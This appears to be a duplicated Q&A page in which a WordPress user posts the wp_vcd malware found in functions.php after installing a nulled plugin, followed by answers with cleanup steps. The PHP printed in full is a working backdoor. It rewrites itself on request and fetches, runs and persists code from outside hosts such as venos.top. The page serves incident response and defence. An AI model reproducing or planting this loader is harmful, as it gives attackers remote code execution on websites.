Questions that are too localized (such as syntax errors, code with restricted access, hacked sites, hosting or support issues) are not in scope. See how do I ask a good question?
Closed 5 years ago.
Improve this questionToday while working, I had tried to install Go Pricing Plugin from this website.
/go-pricing-v3-3-8-wordpress-responsive-pricing-tables/
It was unsuccessful at the first time then I tried for several times but no result. then after some time, my website went blank. I searched for Xampp errors, tried to deactivate plugins from the database(I could not access admin nor frontend)
Then finally, I have found this code in function.php
Is it something I have to worry? Is there any place where I can still find this code on my WordPress?
Now I have removed this code from function.php and website is working fine but I am afraid if my passwords and other things uploading somewhere.
Is there something i have to remove?
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'b08494ffce10b7c547993599bd7deb9e'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='322f4f8d2d11134e9bedae0c97257b9d';
if (($tmpcontent = @file_get_contents(".php") OR $tmpcontent = @file_get_contents_tcurl(".php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif (($tmpcontent = @file_get_contents(".php") OR $tmpcontent = @file_get_contents_tcurl(".php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
Questions that are too localized (such as syntax errors, code with restricted access, hacked sites, hosting or support issues) are not in scope. See how do I ask a good question?
Closed 5 years ago.
Improve this questionToday while working, I had tried to install Go Pricing Plugin from this website.
https://www.downloadfreethemes.download/go-pricing-v3-3-8-wordpress-responsive-pricing-tables/
It was unsuccessful at the first time then I tried for several times but no result. then after some time, my website went blank. I searched for Xampp errors, tried to deactivate plugins from the database(I could not access admin nor frontend)
Then finally, I have found this code in function.php
Is it something I have to worry? Is there any place where I can still find this code on my WordPress?
Now I have removed this code from function.php and website is working fine but I am afraid if my passwords and other things uploading somewhere.
Is there something i have to remove?
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'b08494ffce10b7c547993599bd7deb9e'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='322f4f8d2d11134e9bedae0c97257b9d';
if (($tmpcontent = @file_get_contents("http://www.venos/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.venos/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.venos.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif (($tmpcontent = @file_get_contents("http://www.venos.pw/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.venos.pw/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
- Moral: Do ever never install nulled plugins or themes in your website. Glad you have regained access to your website, you should backup your database, change your passwords. Install Wordfence Security plugin and do a full scan. Good luck! – Elyes At. Commented Nov 10, 2017 at 2:03
4 Answers
Reset to default 3It's good that you've regained access to your website, but without any further action, you'll get hacked again. These are steps to take, in order to clean, and secure your site:
do not panic ( very important )
do not remove anything yourself
install and activate WordFence Security plugin
in Wordfence -> Options, select everything to scan
run Wordfence -> Scan, and follow instructions provided
repeat step 5, until the scan shows no problems
setup firewall in Wordfence
make a full backup of your site, and remember to do it frequently
If the above procedure does not work at any stage, hire a professional!
Note: it is possible, that the plugin, you've attempted to install, caused this infection. Be very careful installing plugins from unknown sources. Try first, to search for plugins, in the official WordPress repository.
This occurs by using NULLED themes and plugins
You have to know that everything nulled is contaminated by malicious code.
When Nulled is installed, the code wakes up at a certain moment, goes through all the folders of your hosting, and installs a script in functions.php and adding several files en wp-includes or wp-admin.
wp-vcd.php
wp-tmp.php
AND ALSO modifies
post.php
functions.php
I never install plugins that come from non-WP-repository sources. Just not worth it, IMHO.
That said, you should uninstall the plugin, then delete it, then make sure the plugin folder is deleted. I would also reinstall WP core, and all themes (remove any plugins/themes that you do not use). I have not used WordFence, so cannot comment on it.
But I have cleaned up some sites, and wrote up a guide for that here that might be helpful. Some would say 'nuke from orbit', but I've found that the things mentioned in my guide work just fine ... at least in the sites that I have cleaned up.
Good luck!
I had the same issue and fixed by doing the below steps:
- Delete extra code from the "wp-includes/post.php" eg:
if (file_exists(dirname(__FILE__) . '/wp-vcd.php'))
include_once(dirname(__FILE__) . '/wp-vcd.php');
- Delete 2 files: "wp-includes/wp-tmp.php" & "wp-includes/wp-vcd.php"
Open "themes/your theme [parent & child ]/functions.php" and delete injected code.
remove from "mysqlM"
PLEASE DON'T DOWNLOAD/INSTALL FROM THIRD-PARTY PLUGIN HACKER/PROVIDERS "They are actual MF"
Hope this will help someone.